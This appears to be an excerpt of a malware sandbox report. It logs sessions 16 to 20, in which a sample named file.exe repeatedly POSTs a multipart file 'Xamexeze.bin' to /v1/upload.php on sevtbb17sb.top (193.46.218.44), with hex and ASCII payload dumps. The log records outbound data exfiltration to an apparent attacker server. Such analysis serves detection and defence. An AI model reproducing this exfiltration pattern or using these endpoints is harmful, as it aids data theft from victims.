Oct 20, 2024 15:25:35.739001989 CEST	2472	OUT	Data Raw: a0 68 40 21 e3 95 43 db ff 3b 1e 3a 52 b3 6e 39 cb fb a0 c6 a1 dd 11 98 68 64 50 9f 34 d6 14 53 c3 cd 76 b0 b0 f4 1c 9f f2 e6 74 01 a5 38 22 d0 2e c3 9c b7 07 48 3d 58 c9 65 2a fe 27 1d bd 2f e0 f6 1e 0f e5 a6 df f3 fc 5c 7e 92 21 63 44 a7 7d c5 Data Ascii: h@!C;:Rn9hdP4Svt8".H=Xe*'/\~!cD},p04`2ump6=^uU@s])fUS},;1BfD@h~'B3@aaw$'s#:
Oct 20, 2024 15:25:35.739025116 CEST	2472	OUT	Data Raw: e7 06 0a 6a 7e e1 d5 15 84 27 34 fe 2f 2e 9d 38 b7 8c 8e a8 22 9b d4 d9 88 a2 ff 18 25 67 2c eb bc 86 24 37 7a 29 b8 17 fb aa 85 ef ac f0 a7 d8 15 ad a8 25 4a c2 08 be 60 30 8f db b8 48 b2 a3 68 18 2b 1f b7 08 78 fc 37 4d 4f 7e ce 63 8b 5f ab 31 Data Ascii: j~'4/.8"%g,$7z)%J`0Hh+x7MO~c_16M4eOwW#CZ\|3h"kh5xp+@Z3yR Q8*4`sp!M2@__G^dn:S@PIKqKH=e
Oct 20, 2024 15:25:35.739046097 CEST	2784	OUT	Data Raw: de a6 f6 86 54 e0 9e 0e f3 98 dd 08 fd 02 81 c1 79 8b 45 de 7f ee 83 2c 77 54 85 11 f7 01 8c 30 c5 7b e5 78 1d 7f 21 92 24 4a f0 54 fa d3 82 d4 76 1a 97 a5 35 be 07 a0 12 0e bd 7a d9 14 fa b3 d6 70 12 2c 0b 41 4f 8c 3b 2d a5 d5 ef 39 35 50 88 c8 Data Ascii: TyE,wT0{x!$JTv5zp,AO;-95PchA%eQ7FM_i.!IOe+Aym\|{}AXPg6.$rPIp00SwWnni-1v$C&@%2Bg`;N-l6"k8M</f-!)5]-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49758	193.46.218.44	80	7472	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 15:25:37.270932913 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary15133046 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 27504 Host: sevtbb17sb.top
Oct 20, 2024 15:25:37.270998955 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 31 35 31 33 33 30 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 58 61 6d Data Ascii: ------Boundary15133046Content-Disposition: form-data; name="file"; filename="Xamexeze.bin"Content-Type: application/octet-stream`v*BxH/s=Kp~veUs$<[j}lAbGz63n!#Dz""1\|
Oct 20, 2024 15:25:37.276021004 CEST	1236	OUT	Data Raw: c3 6d 67 6d 20 90 47 8c aa 73 16 da bc 7d b8 2b f8 01 ea 6c 67 66 9a 6c ab 66 56 0b db f3 fe 0f b5 12 0e 9e fa ca 79 c5 09 a6 28 a2 af ae 18 d0 e7 b8 2c 98 a1 66 68 07 10 4e 6f 2f 4c a0 32 f6 58 83 55 22 98 d8 8f 86 f0 02 d2 b0 36 37 1c 34 e0 ce Data Ascii: mgm Gs}+lgflfVy(,fhNo/L2XU"674MRQ6&cWM};X_X%)9\|lt@48Tqb[CGn\|t+P1_ e4OzHlt-G<jg$fJ46
Oct 20, 2024 15:25:37.276051998 CEST	2472	OUT	Data Raw: f2 47 35 56 d9 59 6d 1b 6d 87 64 12 e1 f9 14 f7 a9 61 f7 1c 02 78 ae cd e9 7a 5e f0 af b2 51 e4 42 98 07 5f 9e 23 11 4f b9 92 09 92 83 36 30 57 10 86 96 81 6e b0 6e d2 1b 10 27 8c ac 82 b6 86 b1 5f 3f 8e 2e eb ae 9a ae 8e a4 e2 4d 8d 3c 42 eb 91 Data Ascii: G5VYmmdaxz^QB_#O60Wnn'_?.M<Bo]-L"I0I$$pBk}dFUA2R;P.U]JsR4_7G!M8={^bF_sl{c]Bsuo/&A?8OB/ZO!,3k
Oct 20, 2024 15:25:37.276132107 CEST	2472	OUT	Data Raw: 4a e7 cc 50 d0 ed 0d 6d a8 37 f1 5e f2 d2 1f 60 a6 c5 52 d6 9a 70 17 e4 79 80 fb e4 29 ab cd 69 52 8a 2b 47 73 ff b9 96 ea 1f e5 20 89 c5 de 4e f9 cb 17 5d 60 3b ac cd 87 62 7f b4 87 13 9c e8 f8 36 78 3c de 9a f8 ca 93 a1 d6 be bf 2f 59 02 fd 8b Data Ascii: JPm7^`Rpy)iR+Gs N]`;b6x</Y#.#[6d!l<A-m 9s^Xz] Dz\U/;F2Q}s>V*O$R$r8\|,("fC48!(h_FM!2bs\rS
Oct 20, 2024 15:25:37.276164055 CEST	2472	OUT	Data Raw: b7 70 a2 d6 02 36 14 b5 96 a3 44 29 6b 0a c5 48 6c 52 fb 38 62 ba ed ad 49 58 0b e9 d5 1e f1 ee b3 fb 74 f7 30 93 1f 92 4d 75 e7 80 c9 5e 45 01 cb 8d c0 78 d6 b7 41 c4 d4 51 c2 ab 2e d4 3b 3c ae 09 37 a2 06 03 9f 4d a2 e9 27 c5 aa e5 d2 13 ca c5 Data Ascii: p6D)kHlR8bIXt0Mu^ExAQ.;<7M'4WW=S/YCA^m;&d[<MKo)4&#m'rpe@f+Y4\"h)GQbdy}d3LW<rFd=
Oct 20, 2024 15:25:37.276241064 CEST	2472	OUT	Data Raw: a0 68 40 21 e3 95 43 db ff 3b 1e 3a 52 b3 6e 39 cb fb a0 c6 a1 dd 11 98 68 64 50 9f 34 d6 14 53 c3 cd 76 b0 b0 f4 1c 9f f2 e6 74 01 a5 38 22 d0 2e c3 9c b7 07 48 3d 58 c9 65 2a fe 27 1d bd 2f e0 f6 1e 0f e5 a6 df f3 fc 5c 7e 92 21 63 44 a7 7d c5 Data Ascii: h@!C;:Rn9hdP4Svt8".H=Xe*'/\~!cD},p04`2ump6=^uU@s])fUS},;1BfD@h~'B3@aaw$'s#:
Oct 20, 2024 15:25:37.276271105 CEST	2472	OUT	Data Raw: e7 06 0a 6a 7e e1 d5 15 84 27 34 fe 2f 2e 9d 38 b7 8c 8e a8 22 9b d4 d9 88 a2 ff 18 25 67 2c eb bc 86 24 37 7a 29 b8 17 fb aa 85 ef ac f0 a7 d8 15 ad a8 25 4a c2 08 be 60 30 8f db b8 48 b2 a3 68 18 2b 1f b7 08 78 fc 37 4d 4f 7e ce 63 8b 5f ab 31 Data Ascii: j~'4/.8"%g,$7z)%J`0Hh+x7MO~c_16M4eOwW#CZ\|3h"kh5xp+@Z3yR Q8*4`sp!M2@__G^dn:S@PIKqKH=e
Oct 20, 2024 15:25:37.276485920 CEST	2784	OUT	Data Raw: de a6 f6 86 54 e0 9e 0e f3 98 dd 08 fd 02 81 c1 79 8b 45 de 7f ee 83 2c 77 54 85 11 f7 01 8c 30 c5 7b e5 78 1d 7f 21 92 24 4a f0 54 fa d3 82 d4 76 1a 97 a5 35 be 07 a0 12 0e bd 7a d9 14 fa b3 d6 70 12 2c 0b 41 4f 8c 3b 2d a5 d5 ef 39 35 50 88 c8 Data Ascii: TyE,wT0{x!$JTv5zp,AO;-95PchA%eQ7FM_i.!IOe+Aym\|{}AXPg6.$rPIp00SwWnni-1v$C&@%2Bg`;N-l6"k8M</f-!)5]-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49759	193.46.218.44	80	7472	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 15:25:38.725718975 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary15133046 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 27504 Host: sevtbb17sb.top
Oct 20, 2024 15:25:38.725800037 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 31 35 31 33 33 30 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 58 61 6d Data Ascii: ------Boundary15133046Content-Disposition: form-data; name="file"; filename="Xamexeze.bin"Content-Type: application/octet-stream`v*BxH/s=Kp~veUs$<[j}lAbGz63n!#Dz""1\|
Oct 20, 2024 15:25:38.730747938 CEST	1236	OUT	Data Raw: c3 6d 67 6d 20 90 47 8c aa 73 16 da bc 7d b8 2b f8 01 ea 6c 67 66 9a 6c ab 66 56 0b db f3 fe 0f b5 12 0e 9e fa ca 79 c5 09 a6 28 a2 af ae 18 d0 e7 b8 2c 98 a1 66 68 07 10 4e 6f 2f 4c a0 32 f6 58 83 55 22 98 d8 8f 86 f0 02 d2 b0 36 37 1c 34 e0 ce Data Ascii: mgm Gs}+lgflfVy(,fhNo/L2XU"674MRQ6&cWM};X_X%)9\|lt@48Tqb[CGn\|t+P1_ e4OzHlt-G<jg$fJ46
Oct 20, 2024 15:25:38.730882883 CEST	2472	OUT	Data Raw: f2 47 35 56 d9 59 6d 1b 6d 87 64 12 e1 f9 14 f7 a9 61 f7 1c 02 78 ae cd e9 7a 5e f0 af b2 51 e4 42 98 07 5f 9e 23 11 4f b9 92 09 92 83 36 30 57 10 86 96 81 6e b0 6e d2 1b 10 27 8c ac 82 b6 86 b1 5f 3f 8e 2e eb ae 9a ae 8e a4 e2 4d 8d 3c 42 eb 91 Data Ascii: G5VYmmdaxz^QB_#O60Wnn'_?.M<Bo]-L"I0I$$pBk}dFUA2R;P.U]JsR4_7G!M8={^bF_sl{c]Bsuo/&A?8OB/ZO!,3k
Oct 20, 2024 15:25:38.730917931 CEST	2472	OUT	Data Raw: 4a e7 cc 50 d0 ed 0d 6d a8 37 f1 5e f2 d2 1f 60 a6 c5 52 d6 9a 70 17 e4 79 80 fb e4 29 ab cd 69 52 8a 2b 47 73 ff b9 96 ea 1f e5 20 89 c5 de 4e f9 cb 17 5d 60 3b ac cd 87 62 7f b4 87 13 9c e8 f8 36 78 3c de 9a f8 ca 93 a1 d6 be bf 2f 59 02 fd 8b Data Ascii: JPm7^`Rpy)iR+Gs N]`;b6x</Y#.#[6d!l<A-m 9s^Xz] Dz\U/;F2Q}s>V*O$R$r8\|,("fC48!(h_FM!2bs\rS
Oct 20, 2024 15:25:38.730945110 CEST	2472	OUT	Data Raw: b7 70 a2 d6 02 36 14 b5 96 a3 44 29 6b 0a c5 48 6c 52 fb 38 62 ba ed ad 49 58 0b e9 d5 1e f1 ee b3 fb 74 f7 30 93 1f 92 4d 75 e7 80 c9 5e 45 01 cb 8d c0 78 d6 b7 41 c4 d4 51 c2 ab 2e d4 3b 3c ae 09 37 a2 06 03 9f 4d a2 e9 27 c5 aa e5 d2 13 ca c5 Data Ascii: p6D)kHlR8bIXt0Mu^ExAQ.;<7M'4WW=S/YCA^m;&d[<MKo)4&#m'rpe@f+Y4\"h)GQbdy}d3LW<rFd=
Oct 20, 2024 15:25:38.730972052 CEST	2472	OUT	Data Raw: a0 68 40 21 e3 95 43 db ff 3b 1e 3a 52 b3 6e 39 cb fb a0 c6 a1 dd 11 98 68 64 50 9f 34 d6 14 53 c3 cd 76 b0 b0 f4 1c 9f f2 e6 74 01 a5 38 22 d0 2e c3 9c b7 07 48 3d 58 c9 65 2a fe 27 1d bd 2f e0 f6 1e 0f e5 a6 df f3 fc 5c 7e 92 21 63 44 a7 7d c5 Data Ascii: h@!C;:Rn9hdP4Svt8".H=Xe*'/\~!cD},p04`2ump6=^uU@s])fUS},;1BfD@h~'B3@aaw$'s#:
Oct 20, 2024 15:25:38.730998039 CEST	2472	OUT	Data Raw: e7 06 0a 6a 7e e1 d5 15 84 27 34 fe 2f 2e 9d 38 b7 8c 8e a8 22 9b d4 d9 88 a2 ff 18 25 67 2c eb bc 86 24 37 7a 29 b8 17 fb aa 85 ef ac f0 a7 d8 15 ad a8 25 4a c2 08 be 60 30 8f db b8 48 b2 a3 68 18 2b 1f b7 08 78 fc 37 4d 4f 7e ce 63 8b 5f ab 31 Data Ascii: j~'4/.8"%g,$7z)%J`0Hh+x7MO~c_16M4eOwW#CZ\|3h"kh5xp+@Z3yR Q8*4`sp!M2@__G^dn:S@PIKqKH=e
Oct 20, 2024 15:25:38.731057882 CEST	2784	OUT	Data Raw: de a6 f6 86 54 e0 9e 0e f3 98 dd 08 fd 02 81 c1 79 8b 45 de 7f ee 83 2c 77 54 85 11 f7 01 8c 30 c5 7b e5 78 1d 7f 21 92 24 4a f0 54 fa d3 82 d4 76 1a 97 a5 35 be 07 a0 12 0e bd 7a d9 14 fa b3 d6 70 12 2c 0b 41 4f 8c 3b 2d a5 d5 ef 39 35 50 88 c8 Data Ascii: TyE,wT0{x!$JTv5zp,AO;-95PchA%eQ7FM_i.!IOe+Aym\|{}AXPg6.$rPIp00SwWnni-1v$C&@%2Bg`;N-l6"k8M</f-!)5]-
Oct 20, 2024 15:25:38.757775068 CEST	1236	OUT	Data Raw: b1 33 8d 1c cd 7d e9 bb 83 44 cb ae 05 0d f7 c0 69 36 14 91 d5 21 8d 3a a1 f2 5d 2e 44 7d a9 f6 a5 83 6e 6f d0 b9 8a ea ee a4 52 27 8f c6 75 b5 2f 3f de 3a 97 62 9d 4c f1 2f 37 f5 dd ab 5b 18 37 3b 74 fb 03 ef 01 73 f3 a0 9a 38 f1 04 99 89 54 0b Data Ascii: 3}Di6!:].D}noR'u/?:bL/7[7;ts8TCxrNH/W#ZVdj-KE`\|_Mbvz'"J0wDrc+7~o_*NwiYNwJ2MTOOZzxA^KK:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49760	193.46.218.44	80	7472	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 15:25:40.202495098 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary15133046 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 27504 Host: sevtbb17sb.top
Oct 20, 2024 15:25:40.202574015 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 31 35 31 33 33 30 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 58 61 6d Data Ascii: ------Boundary15133046Content-Disposition: form-data; name="file"; filename="Xamexeze.bin"Content-Type: application/octet-stream`v*BxH/s=Kp~veUs$<[j}lAbGz63n!#Dz""1\|
Oct 20, 2024 15:25:40.207576036 CEST	1236	OUT	Data Raw: c3 6d 67 6d 20 90 47 8c aa 73 16 da bc 7d b8 2b f8 01 ea 6c 67 66 9a 6c ab 66 56 0b db f3 fe 0f b5 12 0e 9e fa ca 79 c5 09 a6 28 a2 af ae 18 d0 e7 b8 2c 98 a1 66 68 07 10 4e 6f 2f 4c a0 32 f6 58 83 55 22 98 d8 8f 86 f0 02 d2 b0 36 37 1c 34 e0 ce Data Ascii: mgm Gs}+lgflfVy(,fhNo/L2XU"674MRQ6&cWM};X_X%)9\|lt@48Tqb[CGn\|t+P1_ e4OzHlt-G<jg$fJ46
Oct 20, 2024 15:25:40.207643032 CEST	2472	OUT	Data Raw: f2 47 35 56 d9 59 6d 1b 6d 87 64 12 e1 f9 14 f7 a9 61 f7 1c 02 78 ae cd e9 7a 5e f0 af b2 51 e4 42 98 07 5f 9e 23 11 4f b9 92 09 92 83 36 30 57 10 86 96 81 6e b0 6e d2 1b 10 27 8c ac 82 b6 86 b1 5f 3f 8e 2e eb ae 9a ae 8e a4 e2 4d 8d 3c 42 eb 91 Data Ascii: G5VYmmdaxz^QB_#O60Wnn'_?.M<Bo]-L"I0I$$pBk}dFUA2R;P.U]JsR4_7G!M8={^bF_sl{c]Bsuo/&A?8OB/ZO!,3k
Oct 20, 2024 15:25:40.207684040 CEST	4944	OUT	Data Raw: 4a e7 cc 50 d0 ed 0d 6d a8 37 f1 5e f2 d2 1f 60 a6 c5 52 d6 9a 70 17 e4 79 80 fb e4 29 ab cd 69 52 8a 2b 47 73 ff b9 96 ea 1f e5 20 89 c5 de 4e f9 cb 17 5d 60 3b ac cd 87 62 7f b4 87 13 9c e8 f8 36 78 3c de 9a f8 ca 93 a1 d6 be bf 2f 59 02 fd 8b Data Ascii: JPm7^`Rpy)iR+Gs N]`;b6x</Y#.#[6d!l<A-m 9s^Xz] Dz\U/;F2Q}s>V*O$R$r8\|,("fC48!(h_FM!2bs\rS
Oct 20, 2024 15:25:40.207717896 CEST	2472	OUT	Data Raw: a0 68 40 21 e3 95 43 db ff 3b 1e 3a 52 b3 6e 39 cb fb a0 c6 a1 dd 11 98 68 64 50 9f 34 d6 14 53 c3 cd 76 b0 b0 f4 1c 9f f2 e6 74 01 a5 38 22 d0 2e c3 9c b7 07 48 3d 58 c9 65 2a fe 27 1d bd 2f e0 f6 1e 0f e5 a6 df f3 fc 5c 7e 92 21 63 44 a7 7d c5 Data Ascii: h@!C;:Rn9hdP4Svt8".H=Xe*'/\~!cD},p04`2ump6=^uU@s])fUS},;1BfD@h~'B3@aaw$'s#:
Oct 20, 2024 15:25:40.207753897 CEST	2472	OUT	Data Raw: e7 06 0a 6a 7e e1 d5 15 84 27 34 fe 2f 2e 9d 38 b7 8c 8e a8 22 9b d4 d9 88 a2 ff 18 25 67 2c eb bc 86 24 37 7a 29 b8 17 fb aa 85 ef ac f0 a7 d8 15 ad a8 25 4a c2 08 be 60 30 8f db b8 48 b2 a3 68 18 2b 1f b7 08 78 fc 37 4d 4f 7e ce 63 8b 5f ab 31 Data Ascii: j~'4/.8"%g,$7z)%J`0Hh+x7MO~c_16M4eOwW#CZ\|3h"kh5xp+@Z3yR Q8*4`sp!M2@__G^dn:S@PIKqKH=e
Oct 20, 2024 15:25:40.207823038 CEST	2784	OUT	Data Raw: de a6 f6 86 54 e0 9e 0e f3 98 dd 08 fd 02 81 c1 79 8b 45 de 7f ee 83 2c 77 54 85 11 f7 01 8c 30 c5 7b e5 78 1d 7f 21 92 24 4a f0 54 fa d3 82 d4 76 1a 97 a5 35 be 07 a0 12 0e bd 7a d9 14 fa b3 d6 70 12 2c 0b 41 4f 8c 3b 2d a5 d5 ef 39 35 50 88 c8 Data Ascii: TyE,wT0{x!$JTv5zp,AO;-95PchA%eQ7FM_i.!IOe+Aym\|{}AXPg6.$rPIp00SwWnni-1v$C&@%2Bg`;N-l6"k8M</f-!)5]-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49761	193.46.218.44	80	7472	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 15:25:41.687477112 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary15133046 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 27504 Host: sevtbb17sb.top
Oct 20, 2024 15:25:41.687573910 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 31 35 31 33 33 30 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 58 61 6d Data Ascii: ------Boundary15133046Content-Disposition: form-data; name="file"; filename="Xamexeze.bin"Content-Type: application/octet-stream`v*BxH/s=Kp~veUs$<[j}lAbGz63n!#Dz""1\|
Oct 20, 2024 15:25:41.692370892 CEST	1236	OUT	Data Raw: c3 6d 67 6d 20 90 47 8c aa 73 16 da bc 7d b8 2b f8 01 ea 6c 67 66 9a 6c ab 66 56 0b db f3 fe 0f b5 12 0e 9e fa ca 79 c5 09 a6 28 a2 af ae 18 d0 e7 b8 2c 98 a1 66 68 07 10 4e 6f 2f 4c a0 32 f6 58 83 55 22 98 d8 8f 86 f0 02 d2 b0 36 37 1c 34 e0 ce Data Ascii: mgm Gs}+lgflfVy(,fhNo/L2XU"674MRQ6&cWM};X_X%)9\|lt@48Tqb[CGn\|t+P1_ e4OzHlt-G<jg$fJ46
Oct 20, 2024 15:25:41.692660093 CEST	2472	OUT	Data Raw: f2 47 35 56 d9 59 6d 1b 6d 87 64 12 e1 f9 14 f7 a9 61 f7 1c 02 78 ae cd e9 7a 5e f0 af b2 51 e4 42 98 07 5f 9e 23 11 4f b9 92 09 92 83 36 30 57 10 86 96 81 6e b0 6e d2 1b 10 27 8c ac 82 b6 86 b1 5f 3f 8e 2e eb ae 9a ae 8e a4 e2 4d 8d 3c 42 eb 91 Data Ascii: G5VYmmdaxz^QB_#O60Wnn'_?.M<Bo]-L"I0I$$pBk}dFUA2R;P.U]JsR4_7G!M8={^bF_sl{c]Bsuo/&A?8OB/ZO!,3k
Oct 20, 2024 15:25:41.692715883 CEST	2472	OUT	Data Raw: 4a e7 cc 50 d0 ed 0d 6d a8 37 f1 5e f2 d2 1f 60 a6 c5 52 d6 9a 70 17 e4 79 80 fb e4 29 ab cd 69 52 8a 2b 47 73 ff b9 96 ea 1f e5 20 89 c5 de 4e f9 cb 17 5d 60 3b ac cd 87 62 7f b4 87 13 9c e8 f8 36 78 3c de 9a f8 ca 93 a1 d6 be bf 2f 59 02 fd 8b Data Ascii: JPm7^`Rpy)iR+Gs N]`;b6x</Y#.#[6d!l<A-m 9s^Xz] Dz\U/;F2Q}s>V*O$R$r8\|,("fC48!(h_FM!2bs\rS
Oct 20, 2024 15:25:41.692778111 CEST	2472	OUT	Data Raw: b7 70 a2 d6 02 36 14 b5 96 a3 44 29 6b 0a c5 48 6c 52 fb 38 62 ba ed ad 49 58 0b e9 d5 1e f1 ee b3 fb 74 f7 30 93 1f 92 4d 75 e7 80 c9 5e 45 01 cb 8d c0 78 d6 b7 41 c4 d4 51 c2 ab 2e d4 3b 3c ae 09 37 a2 06 03 9f 4d a2 e9 27 c5 aa e5 d2 13 ca c5 Data Ascii: p6D)kHlR8bIXt0Mu^ExAQ.;<7M'4WW=S/YCA^m;&d[<MKo)4&#m'rpe@f+Y4\"h)GQbdy}d3LW<rFd=
Oct 20, 2024 15:25:41.692812920 CEST	2472	OUT	Data Raw: a0 68 40 21 e3 95 43 db ff 3b 1e 3a 52 b3 6e 39 cb fb a0 c6 a1 dd 11 98 68 64 50 9f 34 d6 14 53 c3 cd 76 b0 b0 f4 1c 9f f2 e6 74 01 a5 38 22 d0 2e c3 9c b7 07 48 3d 58 c9 65 2a fe 27 1d bd 2f e0 f6 1e 0f e5 a6 df f3 fc 5c 7e 92 21 63 44 a7 7d c5 Data Ascii: h@!C;:Rn9hdP4Svt8".H=Xe*'/\~!cD},p04`2ump6=^uU@s])fUS},;1BfD@h~'B3@aaw$'s#:
Oct 20, 2024 15:25:41.692842007 CEST	2472	OUT	Data Raw: e7 06 0a 6a 7e e1 d5 15 84 27 34 fe 2f 2e 9d 38 b7 8c 8e a8 22 9b d4 d9 88 a2 ff 18 25 67 2c eb bc 86 24 37 7a 29 b8 17 fb aa 85 ef ac f0 a7 d8 15 ad a8 25 4a c2 08 be 60 30 8f db b8 48 b2 a3 68 18 2b 1f b7 08 78 fc 37 4d 4f 7e ce 63 8b 5f ab 31 Data Ascii: j~'4/.8"%g,$7z)%J`0Hh+x7MO~c_16M4eOwW#CZ\|3h"kh5xp+@Z3yR Q8*4`sp!M2@__G^dn:S@PIKqKH=e
Oct 20, 2024 15:25:41.692910910 CEST	2784	OUT	Data Raw: de a6 f6 86 54 e0 9e 0e f3 98 dd 08 fd 02 81 c1 79 8b 45 de 7f ee 83 2c 77 54 85 11 f7 01 8c 30 c5 7b e5 78 1d 7f 21 92 24 4a f0 54 fa d3 82 d4 76 1a 97 a5 35 be 07 a0 12 0e bd 7a d9 14 fa b3 d6 70 12 2c 0b 41 4f 8c 3b 2d a5 d5 ef 39 35 50 88 c8 Data Ascii: TyE,wT0{x!$JTv5zp,AO;-95PchA%eQ7FM_i.!IOe+Aym\|{}AXPg6.$rPIp00SwWnni-1v$C&@%2Bg`;N-l6"k8M</f-!)5]-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49762	193.46.218.44	80	7472	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 15:25:43.123851061 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary15133046 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 27504 Host: sevtbb17sb.top
Oct 20, 2024 15:25:43.123899937 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 31 35 31 33 33 30 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 58 61 6d Data Ascii: ------Boundary15133046Content-Disposition: form-data; name="file"; filename="Xamexeze.bin"Content-Type: application/octet-stream`v*BxH/s=Kp~veUs$<[j}lAbGz63n!#Dz""1\|
Oct 20, 2024 15:25:43.128715992 CEST	1236	OUT	Data Raw: c3 6d 67 6d 20 90 47 8c aa 73 16 da bc 7d b8 2b f8 01 ea 6c 67 66 9a 6c ab 66 56 0b db f3 fe 0f b5 12 0e 9e fa ca 79 c5 09 a6 28 a2 af ae 18 d0 e7 b8 2c 98 a1 66 68 07 10 4e 6f 2f 4c a0 32 f6 58 83 55 22 98 d8 8f 86 f0 02 d2 b0 36 37 1c 34 e0 ce Data Ascii: mgm Gs}+lgflfVy(,fhNo/L2XU"674MRQ6&cWM};X_X%)9\|lt@48Tqb[CGn\|t+P1_ e4OzHlt-G<jg$fJ46
Oct 20, 2024 15:25:43.128798962 CEST	2472	OUT	Data Raw: f2 47 35 56 d9 59 6d 1b 6d 87 64 12 e1 f9 14 f7 a9 61 f7 1c 02 78 ae cd e9 7a 5e f0 af b2 51 e4 42 98 07 5f 9e 23 11 4f b9 92 09 92 83 36 30 57 10 86 96 81 6e b0 6e d2 1b 10 27 8c ac 82 b6 86 b1 5f 3f 8e 2e eb ae 9a ae 8e a4 e2 4d 8d 3c 42 eb 91 Data Ascii: G5VYmmdaxz^QB_#O60Wnn'_?.M<Bo]-L"I0I$$pBk}dFUA2R;P.U]JsR4_7G!M8={^bF_sl{c]Bsuo/&A?8OB/ZO!,3k
Oct 20, 2024 15:25:43.128858089 CEST	2472	OUT	Data Raw: 4a e7 cc 50 d0 ed 0d 6d a8 37 f1 5e f2 d2 1f 60 a6 c5 52 d6 9a 70 17 e4 79 80 fb e4 29 ab cd 69 52 8a 2b 47 73 ff b9 96 ea 1f e5 20 89 c5 de 4e f9 cb 17 5d 60 3b ac cd 87 62 7f b4 87 13 9c e8 f8 36 78 3c de 9a f8 ca 93 a1 d6 be bf 2f 59 02 fd 8b Data Ascii: JPm7^`Rpy)iR+Gs N]`;b6x</Y#.#[6d!l<A-m 9s^Xz] Dz\U/;F2Q}s>V*O$R$r8\|,("fC48!(h_FM!2bs\rS
Oct 20, 2024 15:25:43.128914118 CEST	2472	OUT	Data Raw: b7 70 a2 d6 02 36 14 b5 96 a3 44 29 6b 0a c5 48 6c 52 fb 38 62 ba ed ad 49 58 0b e9 d5 1e f1 ee b3 fb 74 f7 30 93 1f 92 4d 75 e7 80 c9 5e 45 01 cb 8d c0 78 d6 b7 41 c4 d4 51 c2 ab 2e d4 3b 3c ae 09 37 a2 06 03 9f 4d a2 e9 27 c5 aa e5 d2 13 ca c5 Data Ascii: p6D)kHlR8bIXt0Mu^ExAQ.;<7M'4WW=S/YCA^m;&d[<MKo)4&#m'rpe@f+Y4\"h)GQbdy}d3LW<rFd=
